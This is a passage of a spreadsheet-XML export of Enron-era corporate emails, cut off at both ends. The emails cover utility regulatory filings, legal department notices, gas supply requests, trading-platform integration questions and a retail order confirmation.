&lt;pjmuller@ricochet.net&gt;, "'melanie_gillette@rmiinc.com'"=20_x000D_
&lt;melanie_gillette@rmiinc.com&gt;, "'jbushee@sablaw.com'" &lt;jbushee@sablaw.com&gt;,=_x000D_
=20_x000D_
"'kmccrea@sablaw.com'" &lt;kmccrea@sablaw.com&gt;, "'cohnap@sce.com'"=20_x000D_
&lt;cohnap@sce.com&gt;, "'costac@sce.com'" &lt;costac@sce.com&gt;, "'fosterbc@sce.com'"=_x000D_
=20_x000D_
&lt;fosterbc@sce.com&gt;, "'lehrerjm@sce.com'" &lt;lehrerjm@sce.com&gt;,=20_x000D_
"'dbb@sdcity.sannet.gov'" &lt;dbb@sdcity.sannet.gov&gt;, "'kmelville@sempra.com'"=_x000D_
=20_x000D_
&lt;kmelville@sempra.com&gt;, "'LVanWagenen@sempra.com'" &lt;LVanWagenen@sempra.com&gt;=_x000D_
,=20_x000D_
"'anchau@shellus.com'" &lt;anchau@shellus.com&gt;, "'dmarcus@slip.net'"=20_x000D_
&lt;dmarcus@slip.net&gt;, "'aorchard@smud.org'" &lt;aorchard@smud.org&gt;,=20_x000D_
"'thaines@smud.org'" &lt;thaines@smud.org&gt;, "'bfinkelstein@turn.org'"=20_x000D_
&lt;bfinkelstein@turn.org&gt;_x000D_
Cc: "Cohn, Ann" &lt;Ann.Cohn@sce.com&gt;,"Fox, Beth" &lt;Beth.Fox@sce.com&gt;, "Lehrer,=_x000D_
=20_x000D_
James" &lt;James.Lehrer@sce.com&gt;, "Chadsey, Linda" &lt;Linda.Chadsey@sce.com&gt;,=20_x000D_
"Monalisa, Dina" &lt;MONALID@sce.com&gt;, "Simpson, Mary C" &lt;SIMPSOMC@sce.com&gt;_x000D_
Subject: A. 99-01-034 SCE's Ex Parte Request for the ImmediateSuspension,=_x000D_
=20_x000D_
etc, 10-5-00_x000D_
Mime-Version: 1.0_x000D_
Content-Type: multipart/mixed; boundary=3D"=3D_1941F0B8.89E8C083"_x000D_
_x000D_
 &lt;&lt;SCE's Ex Parte Request For Suspension, Etc.&gt;&gt;_x000D_
_x000D_
 Attached is SCE's Ex Parte Request For The Immediate Suspension Of_x000D_
The Effective Date of Portions of D.99-10-057 and D.00-03-058 Relating To_x000D_
The Post Rate Freeze Recovery Of The TRA Balance._x000D_
_x000D_
 This document was filed and served today on all parties of record in_x000D_
A. 99-01-034, et. al., (PTR)_x000D_
_x000D_
 Thank you,_x000D_
Anthony V. Archer_x000D_
So. Cal. Edison's Legal  Dept._x000D_
Tele: 626 302-3104_x000D_
Pax:: 2-3104_x000D_
Fax:: 2-2304_x000D_
Suite 315_x000D_
_x000D_
 - 10-5-0.PDF_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'dmurphy@utilicorp.com'})</t>
  </si>
  <si>
    <t>check this out...............www.gorelieberman-2000.com/</t>
  </si>
  <si>
    <t>Thu, 27 Apr 2000 05:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tim_x000D_
_x000D_
I assume you know that you have to make a presentation at the offsite.  Can _x000D_
you send me a copy by Monday.  If not let me know._x000D_
_x000D_
Thanks John</t>
  </si>
  <si>
    <t>Fri, 26 May 2000 00:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jere.overdyke@enron.com', 'vince.kaminski@enron.com'})</t>
  </si>
  <si>
    <t>Super Saturday June 3, 2000</t>
  </si>
  <si>
    <t xml:space="preserve">Gentlemen - Thanks for your support of ENA's Super Saturday next week.  I _x000D_
have attached a preliminary schedule (which will change I'm surebut I will _x000D_
keep you updated) for your review.  Thanks again.  Ted  </t>
  </si>
  <si>
    <t>Tue, 3 Oct 2000 09:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robin.jordan@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'patrick.grant@enron.com', 'jan.johnson@enron.com', 'william.krenz@enron.com', 'janice.moore@enron.com', 'robert.vote@enron.com', 'ronald.adzgery@enron.com', 'robert.gresch@enron.com', 'michael.smalling@enron.com', 'greer.mendelow@enron.com', 'richard.dimichele@enron.com', 'robert.ward@enron.com', 'susan.scott@enron.com', 'bonnie.nelson@enron.com', 'richard.sanders@enron.com', 'carlos.sole@enron.com', 'brian.schaffer@enron.com', 'lou.stoler@enron.com', 'thane.twiggs@enron.com', 'shonnie.daniel@enron.com', 'mark.taylor@enron.com', 'michael.moran@enron.com', 'dub.morris@enron.com', 'mark.greenberg@enron.com', 'gerald.nemec@enron.com', 'sara.shackleton@enron.com', 'alicia.goodrow@enron.com', 'robert.frank@enron.com', 'gloria.ogenyi@enron.com', 'robbi.rossi@enron.com', 'james.grace@enron.com', 'michael.smith@enron.com', 'kelly.higgason@enron.com', 'deborah.culver@enron.com', 'kristina.mordaunt@enron.com', 'randy.pais@enron.com', 'scott.sefton@enron.com', 'francisco.leite@enron.com', 'deborah.asmus@enron.com', 'frazier.king@enron.com', 'christie.patrick@enron.com', 'davis.maxey@enron.com', 'trey.cash@enron.com', 'donette.dewar@enron.com', 'phil.patman@enron.com', 'mary.cook@enron.com', 'reynaldo.garcia@enron.com', 'lance.schuler-legal@enron.com', 'elisa.donovan@enron.com', 'kim.monk@enron.com', 'stephen.douglas@enron.com', 'james.derrick@enron.com', 'philip.crowley@enron.com', 'roseann.engeldorf@enron.com', 'bob.carter@enron.com', 'marcus.nettelton@enron.com', 'eileen.kisluk@enron.com', 'jeffrey.fischer@enron.com', 'britt.davis@enron.com', 'sheila.tweed@enron.com', 'david.roland@enron.com', 'coralina.rivera@enron.com', 'louis.soldano@enron.com', 'leesa.white@enron.com', 'annmarie.tiller@enron.com', 'barbara.gray@enron.com', 'janet.moore@enron.com', 'edwin.essandoh@enron.com', 'daniel.rogers@enron.com', 'rockford.meyer@enron.com', 'kriste.sullivan@enron.com', 'staci.holtzman@enron.com', 'mark.haedicke@enron.com', 'morris.clark@enron.com', 'brent.vasconcellos@enron.com', 'dan.hyvl@enron.com', 'shelley.corman@enron.com', 'monica.richards@enron.com', 'wayne.gresham@enron.com', 'kay.mann@enron.com', 'shawna.flynn@enron.com', 'robert.hermann@enron.com', 'victor.nieto@enron.com', 'vicki.sharp@enron.com', 'julia.chin@enron.com', 'bonnie.white@enron.com', 'sean.long@enron.com', 'bill.bowes@enron.com', 'alan.aronowitz@enron.com', 'john.ale@enron.com', 'keith.gercken@enron.com', 'julia.murray@enron.com', 'david.portz@enron.com', 'richard.freed@enron.com', 'steve.hooser@enron.com', 'matthew.gockerman@enron.com', 'sharon.butcher@enron.com', 'tina.livingston@enron.com', 'carlos.ryerson@enron.com', 'stuart.zisman@enron.com', 'christian.yoder@enron.com', 'charles.cheek@enron.com', 'alberto.jimenez@enron.com', 'jim.armogida@enron.com', 'nancy.corbet@enron.com', 'jeffrey.hodge@enron.com', 'rob.walls@enron.com', 'clement.abrams@enron.com', 'peggy.banczak@enron.com', 'cynthia.harkness@enron.com', 'kim.wilkie@enron.com', 'anne.koehler@enron.com', 'scott.dieball@enron.com', 'allan.conge@enron.com', 'yao.apasu@enron.com', 'barton.clark@enron.com', 'angela.davis@enron.com', 'michelle.maynard@enron.com', 'james.keller@enron.com', 'stacy.dickson@enron.com', 'miguel.mendoza@enron.com', 'andrew.ralston@enron.com', 'wayne.gardner@enron.com', 'tim.dorsey@enron.com', 'mark.holsworth@enron.com', 'lara.leibman@enron.com', 'gil.melman@enron.com', 'j.metts@enron.com', 'carmen.pokluda@enron.com', 'harry.collins@enron.com', 'michael.robison@enron.com', 'bret.reich@enron.com', 'christi.nicolay@enron.com', 'tom.shelton@enron.com', 'peter.vecchio@enron.com', 'robert.eickenroht@enron.com', 'nora.dobin@enron.com', 'robert.george@enron.com', 'gerard.willis@enron.com', 'michelle.cash@enron.com', 'joel.ephross@enron.com', 'bill.rapp@enron.com', 'susan.musch@enron.com', 'stephen.wallace@enron.com', 'dominic.carolan@enron.com', 'travis.mccullough@enron.com', 'lisa.mellencamp@enron.com', 'david.grant@enron.com', 'brent.hendry@enron.com', 'james.hughes@enron.com', 'michelle.hicks@enron.com', 'martin.penkwitz@enron.com', 'jeff.blumenthal@enron.com', 'bruce.lundstrom@enron.com', 'ann.white@enron.com', 'ann.ballard@enron.com', 'roger.balog@enron.com', 'teresa.bushman@enron.com', 'colleen.raker@enron.com', 'elizabeth.sager@enron.com', 'richard.shapiro@enron.com', 'margaret.maddox@enron.com', 'beth.wapner@enron.com', 'steven.kean@enron.com', 'jack.harmuth@enron.com', 'ned.crady@enron.com', 'john.viverito@enron.com', 'lee.huber@enron.com', 'dan.lyons@enron.com', 'shari.stack@enron.com', 'gareth.bahlmann@enron.com', 'annette.glod@enron.com', 'tony.jarrett@enron.com', 'frank.sayre@enron.com', 'mark.antonvich@enron.com', 'tara.rafter@enron.com', 'jeff.herrold@enron.com', 'carol.clair@enron.com', 'tony.pryor@enron.com', 'marianne.castano@enron.com', 'david.koogler@enron.com', 'john.schwartzenburg@enron.com', 'rex.rogers@enron.com', 'tod.lindholm@enron.com', 'luis.derrota@enron.com', 'robert.bruce@enron.com', 'david.bargainer@enron.com'})</t>
  </si>
  <si>
    <t>CLE PRESENTATION</t>
  </si>
  <si>
    <t xml:space="preserve"> Patricia Casey, a partner in Haynes and Boone's litigation section, has _x000D_
offered to give a continuing education presentation "Guide to Principles of _x000D_
the Attorney-Client and Work Product Privileges" to interested Houston-based _x000D_
Enron lawyers.  The presentation will be held Thursday, October 12th in the _x000D_
Forum at 2 Allen Center, located on the 12th Floor from 10:00 a.m. - 11:00 _x000D_
a.m._x000D_
_x000D_
 The seating in the Forum is limited to 60 persons, therefore, please RSVP to _x000D_
Robin Jordan via email or phone x33246 if you would like to attend this _x000D_
session.  Due to the number of in-house attorneys, if interest is high, the _x000D_
presentation will be given again._x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Dec 1999 05:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Carol St. Clair -- Year End Closings</t>
  </si>
  <si>
    <t>Gareth:  Thanks for that note.  Have a happy new year!    Mark Haedicke</t>
  </si>
  <si>
    <t>Wed, 21 Mar 2001 09:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'nicole.hunter@enron.com', 'aparna.rajaram@enron.com', 'steve.venturatos@enron.com', 'frank.davis@enron.com', 'tana.jones@enron.com', 'bill.hare@enron.com', 'ken.curry@enron.com', 'tanya.rohauer@enron.com', 'kelly.lombardi@enron.com', 'tom.moran@enron.com', 'camille.gerard@enron.com', 'bernice.rodriguez@enron.com'})</t>
  </si>
  <si>
    <t>Re: Click Paper Approvals, 03-15-01</t>
  </si>
  <si>
    <t xml:space="preserve">GCP adjustments will be highlighted in red._x000D_
_x000D_
  _x000D_
_x000D_
Rgds._x000D_
_x000D_
Samuel x3-9890_x000D_
ENW_GCP_x000D_
_x000D_
_x000D_
_x000D_
From: Aparna Rajaram/ENRON@enronXgate on 03/14/2001 05:41 PM_x000D_
To: Kelly Lombardi/NA/Enron@Enron, Samuel Schott/HOU/ECT@ECT, Bernice _x000D_
Rodriguez/HOU/ECT@ECT, Bill D Hare/HOU/ECT@ect, Steve Venturatos/HOU/ECT@ECT, _x000D_
Camille Gerard/Corp/Enron@ENRON, Samuel Schott/HOU/ECT@ECT, Tanya _x000D_
Rohauer/ENRON@enronXgate, Tom Moran/ENRON@enronXgate, Tana Jones/HOU/ECT@ECT, _x000D_
Frank L Davis/HOU/ECT@ECT, Ken Curry/ENRON@enronXgate, Nicole _x000D_
Hunter/NA/Enron@Enron_x000D_
cc:  _x000D_
Subject: Click Paper Approvals, 03-15-01_x000D_
_x000D_
Please see attached._x000D_
_x000D_
_x000D_
_x000D_
Regards,_x000D_
_x000D_
Aparna Rajaram_x000D_
ext. 5-4563_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2001 07:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>J.M. Huber</t>
  </si>
  <si>
    <t>Cindy,_x000D_
_x000D_
Please forward a copy of the J.M. Huber Corporation Guaranty to my _x000D_
attention.  The Guaranty is dated August 1, 2000._x000D_
_x000D_
Thanks!!_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Thu, 27 Jul 2000 04:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>HPL Nom for July28, 2000</t>
  </si>
  <si>
    <t>(See attached file: hpl0728.xls)_x000D_
_x000D_
 - hpl0728.xls</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 12:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Westinghouse "Wet" Turbine</t>
  </si>
  <si>
    <t>I have involved Andy Edison, one of ENA's litigation managers, in reviewing _x000D_
our potential claims against Westinghouse with respect to the "wet" turbine _x000D_
and the general issue of whether we have any type of "duty to mitigate" the _x000D_
expense of the cost of the replacement generator (ie, whether we have a duty _x000D_
to purchase the replacement generator at $3 mm since its cost might go up.)  _x000D_
Andy has some interesting thoughts and questions, including why we aren't _x000D_
pressing Westinghouse harder with our claim and aren't pressing them harder _x000D_
to hold their price on the replacement generator for a longer time period _x000D_
given their potential exposure to us (arguably we might have a duty to _x000D_
mitigate the expense associated with the replacement generator if we have a _x000D_
reasonable basis for believing that the cost might go up).  Since there are _x000D_
no black and white answers, it probably would be useful to have a meeting to _x000D_
discuss our thoughts and address questions that we and you all may have.  _x000D_
Please let me know your availability to meet either this week or early next.  _x000D_
Lastly, Andy has noted that under our insurance policy we need to bring a _x000D_
lawsuit against the insurance carrier if they to fail resolve our claim _x000D_
before July 2001.  The practical impact of this is that we need to prepare a _x000D_
letter agreement whereby we and the insurance company agree to extend that _x000D_
time period.  Andy has recently prepared such a letter with respect to _x000D_
another claim and has agreed to prepare one for this claim as well.  Thanks.</t>
  </si>
  <si>
    <t>Wed, 14 Jun 2000 09:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lin.reece@southernenergy.com'})</t>
  </si>
  <si>
    <t>RE: CONFIRMATION COVERSHEET PROCESS LTR.DOC</t>
  </si>
  <si>
    <t xml:space="preserve">Lin:_x000D_
Yes, that's right the Confirmation Reply per your earloier request remains as _x000D_
is.  My fax number is 713-646-3393._x000D_
Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
_x000D_
_x000D_
_x000D_
	"Reece, Lin" &lt;Lin.Reece@SouthernEnergy.Com&gt;_x000D_
	06/14/2000 04:12 PM_x000D_
		 _x000D_
		 To: "'Carol.St.Clair@enron.com'" &lt;Carol.St.Clair@enron.com&gt;_x000D_
		 cc: "McGough, Scott" &lt;Scott.McGough@SouthernEnergy.Com&gt;_x000D_
		 Subject: RE: CONFIRMATION COVERSHEET PROCESS LTR.DOC_x000D_
_x000D_
_x000D_
Thanks so much.  I'm sending your revisions to Scott for review.  The_x000D_
Confirmation Reply has been totally red lined out of these attachments, but_x000D_
I am assuming that it remains as we originally designed it.  Please advise_x000D_
if this is not correct.  If your changes are accepted, I will print a copy_x000D_
and have Scott McGough execute it.  Please give me your fax number so that I_x000D_
can fax it to you.  Regards, Lin Reece_x000D_
_x000D_
-----Original Message-----_x000D_
From: Carol.St.Clair@enron.com [mailto:Carol.St.Clair@enron.com]_x000D_
Sent: Wednesday, June 14, 2000 4:13 PM_x000D_
To: Lin.Reece@SouthernEnergy.Com_x000D_
Cc: Larry.Joe.Hunter@enron.com_x000D_
Subject: RE: CONFIRMATION COVERSHEET PROCESS LTR.DOC_x000D_
_x000D_
_x000D_
_x000D_
Lin:_x000D_
Enclosed is a revised letter._x000D_
_x000D_
(See attached file: Southern Confirm Letter 2 RED.DOC)(See attached file:_x000D_
Southern Confirm Letter 2.DOC)_x000D_
_x000D_
Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                    "Reece, Lin"_x000D_
_x000D_
                    &lt;Lin.Reece@SouthernE        To:_x000D_
"'Carol.St.Clair@enron.com'" &lt;Carol.St.Clair@enron.com&gt;_x000D_
                    nergy.Com&gt;                  cc:     "McGough, Scott"_x000D_
&lt;Scott.McGough@SouthernEnergy.Com&gt;,_x000D_
_x000D_
"'larry.joe.hunter@enron.com'" &lt;larry.joe.hunter@enron.com&gt;_x000D_
                    06/14/2000 11:21 AM         Subject:     RE:_x000D_
CONFIRMATION COVERSHEET PROCESS LTR.DOC_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Dear Carol,    We do not want to create an agreement specfic coversheet for_x000D_
each counterparty.  Is there some way to put language in the body of the_x000D_
letter agreement to address your concerns.  The procedure we are proposing_x000D_
is intended to supplement current requirements in the ISDA, not replace_x000D_
them.  If you feel that additional definition needs to be added to the_x000D_
confirmation process, shouldn't we put that definition in the letter_x000D_
agreement rather than on the cover sheet?_x000D_
_x000D_
Our goal is to be able to expedite our response to counterparty confirms._x000D_
In order to do this we need to have the same cover sheet in place for each_x000D_
counterparty.  Please call me at 678-579-3378 so that we may discuss_x000D_
possible solutions.  Thanks, Lin_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Carol.St.Clair@enron.com [mailto:Carol.St.Clair@enron.com]_x000D_
Sent: Wednesday, June 14, 2000 11:12 AM_x000D_
To: Lin.Reece@SouthernEnergy.Com_x000D_
Cc: Larry.Joe.Hunter@enron.com_x000D_
Subject: Re: CONFIRMATION COVERSHEET PROCESS LTR.DOC_x000D_
_x000D_
_x000D_
_x000D_
Lin:_x000D_
Enclosed are clean and marked  versions of my redo of the reply letter._x000D_
_x000D_
_x000D_
(See attached file: Southern Confirm Letter 2 RED.DOC)(See attached file:_x000D_
Southern Confirm Letter 2.DOC)_x000D_
Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                    "Reece, Lin"_x000D_
_x000D_
                    &lt;Lin.Reece@SouthernE        To:_x000D_
"'carol.st.clair@enron.com'" &lt;carol.st.clair@enron.com&gt;_x000D_
                    nergy.Com&gt;                  cc:_x000D_
_x000D_
                                                Subject:     CONFIRMATION_x000D_
COVERSHEET PROCESS LTR.DOC_x000D_
                    06/13/2000 02:25 PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt;CONFIRMATION COVERSHEET PROCESS LTR.DOC&gt;&gt;_x000D_
_x000D_
Carol,  Please feel free to change the letter agreement.  The coversheet_x000D_
needs to remain as it is, because we are using this same sheet for all_x000D_
counterparties.  Thanks, Lin_x000D_
_x000D_
(See attached file: CONFIRMATION COVERSHEET PROCESS LTR.DOC)_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 02:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>daily crude and crude/products matrix as attachments 5/7</t>
  </si>
  <si>
    <t>The information contained herein is based on sources that we believe to be_x000D_
reliable, but we do not represent that it is accurate or complete.  Nothing_x000D_
contained herein should be considered as an offer to sell or a solicitation_x000D_
of an offer to buy any financial instruments discussed herein.  Any_x000D_
opinions expressed herein are solely those of the author.  As such, they_x000D_
may differ in material respects from those of, or expressed or published by_x000D_
on behalf of Carr Futures or its officers, directors, employees or_x000D_
affiliates.  , 2001 Carr Futures_x000D_
_x000D_
_x000D_
The charts are now in the most recent version of Adobe Acrobat 4.0 and they_x000D_
should print clearly from Adobe Acrobat Reader 3.0 or higher. Adobe Acrobat_x000D_
Reader 4.0 may be downloaded for FREE from www.adobe.com._x000D_
_x000D_
(See attached file: SpreadmatrixCL77.pdf)(See attached file: crude77.pdf)_x000D_
_x000D_
_x000D_
Carr Futures_x000D_
150 S. Wacker Dr., Suite 1500_x000D_
Chicago, IL 60606  USA_x000D_
Tel:  312-368-6149_x000D_
Fax:  312-368-2281_x000D_
soblander@carrfut.com_x000D_
http://www.carrfut.com_x000D_
 - SpreadmatrixCL77.pdf_x000D_
 - crude77.pdf</t>
  </si>
  <si>
    <t>Thu, 4 Oct 2001 13:19:37 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'julie_austin@illinoispower.com'})</t>
  </si>
  <si>
    <t>Additional Winter Supply RFP</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
----- Forwarded by Julie Austin/DEC/Dynegy on 10/04/01 03:19 PM -----_x000D_
_x000D_
                    Mike Carter_x000D_
                                         To:     Julie Austin/DEC/Dynegy@Dynegy_x000D_
                    10/04/01             cc:_x000D_
                    03:07 PM             Subject:     Additional Winter Supply RFP_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Illinois Power is requesting proposals for firm gas supply into Natural Gas_x000D_
Pipeline in the MidContinent Zone and Louisiana Zone._x000D_
_x000D_
Term:          Five months (November 1, 2001 through March 31, 2002)._x000D_
_x000D_
Quantity: Approximately 25,000 MMBtu/day in either zone (minimum 5,000_x000D_
          MMBtu/d packages)_x000D_
          Quote pricing on 0 - 100 percent swing rights._x000D_
_x000D_
Price:         Index plus or minus any reservation._x000D_
_x000D_
_x000D_
Illinois Power is also requesting proposals for firm gas supply into_x000D_
Trunkline West Louisiana._x000D_
_x000D_
Term:          Five months (November 1, 2001 through March 31, 2002)._x000D_
_x000D_
Quantity: Approximately 25,000 MMBtu/day (minimum 5,000 MMBtu/d packages)_x000D_
          Quote pricing on 0 - 100 percent swing rights._x000D_
_x000D_
Price:         Index plus or minus any reservation._x000D_
_x000D_
_x000D_
Please submit your complete proposal by 5:00 p.m., Central Standard Time,_x000D_
on Monday, October 8, 2001.  Proposals may be submitted by fax to_x000D_
217-424-8304 or e-mail to mike_carter@illinoispower.com and_x000D_
julie_austin@illinoispower.com, and follow up with a hard copy by mail.  If_x000D_
you have any questions, please feel free to call Mike Carter at_x000D_
217-424-8128 or Julie Austin at 217-424-8366._x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 07:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Kern River</t>
  </si>
  <si>
    <t xml:space="preserve">Hi John:_x000D_
_x000D_
Miles and Knippa just came back from visiting Kern River and gave me a new _x000D_
delivery point for this project.  We want to reprice the deal at OPAL.  I am _x000D_
attaching a small spreadsheet with a one year snapshot of monthly MMBtus for _x000D_
repricing it.  I would appreciate it if you send me the new gas price as soon _x000D_
as you get a chance._x000D_
_x000D_
Hope everything is going well._x000D_
_x000D_
Maria_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 4 Feb 2002 06:58:13 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'pat.odonnell@ubsw.com'})</t>
  </si>
  <si>
    <t>Please help</t>
  </si>
  <si>
    <t>Canada appears to be an issue._x000D_
_x000D_
We need to make swift progress on this - unlike in the US the contracting entity with our counterparties will not be UBS AG, London Division but UBS Warburg Energy (Canada) Ltd.  With the lack of parental company guarantees forth coming from UBS, this is going to be an issue._x000D_
_x000D_
There are two main points, because of our current history our customers will not contract lightly with a subsidiary with no guarantee and secondly the credit group are asking for guarantees from our customers._x000D_
_x000D_
Please let me know how we can progress on this._x000D_
_x000D_
Louise</t>
  </si>
  <si>
    <t>Tue, 30 Jan 2001 02:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'csandhe@enron.com'})</t>
  </si>
  <si>
    <t>Questions you requested</t>
  </si>
  <si>
    <t>The Q and A you asked me to draft are attached.</t>
  </si>
  <si>
    <t>Thu, 19 Oct 2000 03:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>City Streets</t>
  </si>
  <si>
    <t xml:space="preserve">I assume you have heard that EOL is soliciting HoustonStreet.com and _x000D_
QuickQuote.com in order to _x000D_
increase their volume and market coverage.  The message below is from Ron _x000D_
Nolte, our IT person_x000D_
for the confirmation systems.  I think he is asking some very pertinent _x000D_
questions that may need your_x000D_
legal opinion._x000D_
_x000D_
I guess my fear is that you have not been included in the conversations and _x000D_
set-up of EOL's discussions_x000D_
with HoustonStreet.com and QuickQuote.com._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Bob Bowen/HOU/ECT on 10/19/2000 10:26 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Ron Nolte_x000D_
10/16/2000 12:37 PM_x000D_
To: Bob Bowen/HOU/ECT@ECT, Jennifer deBoisblanc Denny/HOU/ECT@ECT, Torrey _x000D_
Moorer/HOU/ECT@ECT, Jeff Johnson/Corp/Enron@Enron_x000D_
cc:  _x000D_
Subject: City Streets_x000D_
_x000D_
_x000D_
Just came back from a meeting in which Jennifer deBoisblanc Denny and Torrey _x000D_
Moorer informed everyone about the new venture _x000D_
between HoustonStreet.Com and Enron and QuickQuote.com and Enron.   In 90 _x000D_
days, HoustonStreet.Com and QuickQuote.com will be offering products offered _x000D_
on EOL._x000D_
_x000D_
I solicit comments from everyone._x000D_
_x000D_
As I understand it, a party wishing to trade gas and power can log onto _x000D_
HoustonStreet.Com and  deals offered on EOL will _x000D_
magically appear. The party might think, "Hey, I can't do better than this on _x000D_
EOL, I'll take this deal".  The deal is transacted   _x000D_
and HoustonStreet.Com number is assigned.  As soon as the "Do the Deal"  _x000D_
button is clicked, the transaction is sent to EOL where_x000D_
it is validated.  An EOL deal number is assigned but as far as the party _x000D_
doing the deal is concerned, the deal is a HoustonStreet.Com deal._x000D_
_x000D_
In the case of a gas deal,  the deal will be bridged to both Sitara and _x000D_
TAGG.  The deal at this point would have four deal numbers:_x000D_
_x000D_
  HoustonStreet.Com Deal #_x000D_
  EOL Deal #_x000D_
  Sitara Deal #_x000D_
  TAGG Deal #_x000D_
_x000D_
Based on the meeting, the following requirements surfaced.  If you are in _x000D_
TAGG,  you should be able to access the deal using_x000D_
HoustonStreet.Com  Deal #, or the EOL Deal #, or the TAGG Deal #._x000D_
_x000D_
If you are in DCAF II,  you should be able to access the deal using _x000D_
HoustonStreet.Com Deal #, or the EOL Deal #, or the Sitara Deal #._x000D_
_x000D_
This requirement implies that the capture windows in TAGG and Sitara ( I _x000D_
assume ) will need to be changed to capture both_x000D_
the HoustonStreet.Com Deal # and EOL Deal #.  The TAGG Deal number itself  is _x000D_
assigned by the Capture program._x000D_
_x000D_
This will require a database change as well as fairly significant ( it was _x000D_
assumed that there is only one "Originating System")  program modifications _x000D_
to TAGG Deal Capture, TAGG Deal Clearing,  DCAF II, and Enpower Autoconfirm ( _x000D_
clears Power deals )._x000D_
_x000D_
Now for some issues:_x000D_
_x000D_
1) Who is the internal party on the deal that is to appear on the _x000D_
confirmation?  Will a HoustonStreet.Com and_x000D_
 a QuickQuote internal party be set up in Global Counterparty?  _x000D_
_x000D_
 There are implications for Global Counterparty since all address information _x000D_
is set up based on who the external party is doing business with._x000D_
_x000D_
 In other words, if there are new internal parties, the address information _x000D_
set up for these same external  parties that do trades on EOL will_x000D_
 have to be set up again for doing business with the new internal parties._x000D_
_x000D_
2) Is the confirm to sport a HoustonStreet.Com logo and a QuickQuote.com logo?_x000D_
_x000D_
3) Who is to sign the confirmation letters when signatures are required?_x000D_
_x000D_
4) Contract numbers will have to be set up just as they are for trading under _x000D_
EOL.  But who are the contracts between?  If_x000D_
 new internal parties are set up for HoustonStreet.Com and QuickQuote.com, _x000D_
then contracts will have to be set up_x000D_
 between the new internal parties.  But since a HoustonStreet.Com deal goes _x000D_
through EOL, how will the appropriate_x000D_
 contract be assigned?; i.e., if Koch does a deal through HoustonStreet.Com, _x000D_
is  a different contract assigned _x000D_
 in EOL versus if Koch does the deal through EOL itself?_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 29 Jan 2001 06:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'patrick.hanse@enron.com'})</t>
  </si>
  <si>
    <t>Re: Another Vac. request</t>
  </si>
  <si>
    <t>Good with me_x000D_
_x000D_
Kayne</t>
  </si>
  <si>
    <t>Fri, 7 Jul 2000 07:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'orderdetails@buy.com'})</t>
  </si>
  <si>
    <t>Thanks for your order!</t>
  </si>
  <si>
    <t>Dear Gerald Nemec,_x000D_
_x000D_
Thank you for your order. We are proud to be your Internet superstore._x000D_
_x000D_
We pride ourselves on delivering the best possible shopping_x000D_
experience to you and all of our customers. That means that from_x000D_
the moment you enter buy.com to the moment your order is delivered_x000D_
to your door - we are dedicated to your satisfaction._x000D_
_x000D_
We have included your complete order information below. Please feel_x000D_
free to contact us at anytime if you have any questions regarding_x000D_
this or any other order by visiting customer support located at_x000D_
https://www.us.buy.com/support._x000D_
_x000D_
Once again, thank you for placing your order with buy.com, the_x000D_
internet superstore. We value your business and will continue to_x000D_
offer top brands, superstore selection, low prices, and outstanding_x000D_
service._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Travis Fagan_x000D_
Vice President, Customer Support_x000D_
_x000D_
*******************************_x000D_
YOUR ORDER INFORMATION:_x000D_
*******************************_x000D_
_x000D_
order #6443840:_x000D_
_x000D_
item sku #40054660  quantity: 1   El Mariachi_x000D_
_x000D_
We'll send you an email as soon as your items ship._x000D_
_x000D_
You can track your order online at_x000D_
https://www.us.buy.com/support/login.asp._x000D_
_x000D_
Please remember the following as you await your order:_x000D_
_x000D_
-We will not charge your credit card until your items ship and_x000D_
